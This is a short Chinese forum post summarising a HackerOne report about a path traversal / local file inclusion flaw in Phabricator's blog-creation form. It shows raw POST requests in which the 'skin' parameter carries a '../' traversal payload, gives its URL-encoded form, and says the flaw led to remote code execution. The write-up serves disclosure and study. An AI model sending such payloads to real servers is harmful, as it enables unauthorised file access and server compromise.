|
|
|
正文
创建博客/文章/文件功能出现问题。
原请求:
- POST /blog/new/ HTTP/1.1
- Host: target.com
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://phabricator.48bits.com/phame/blog/new/
- Cookie: phsid=o36kfovszv6sqpbjheacicu2ykx25lqoh5iepeit; phusr=guest
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 254
- __csrf__=xxxyyy&__form__=1&name=username&skin=xxxxx
注入payload之后:
- POST /blog/new/ HTTP/1.1
- Host: target.com
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://phabricator.48bits.com/phame/blog/new/
- Cookie: phsid=o36kfovszv6sqpbjheacicu2ykx25lqoh5iepeit; phusr=guest
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 254
- __csrf__=xxxyyy&__form__=1&name=username&skin=../../../../../../../../../../tmp/test
注:../../../../../../../../../../tmp/test编码以后就是%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%74%6d%70%2f%74%65%73%74
类似这种创建文章/博客/文件之类的一个 隐患就是有可能将文件上传到服务器
这里就出现了一个利用LFI获得了远程代码执行,从而获得服务器数据的访问权限
参考
https://hackerone.com/reports/39428
|
|
发表于 2024-5-22 09:31:53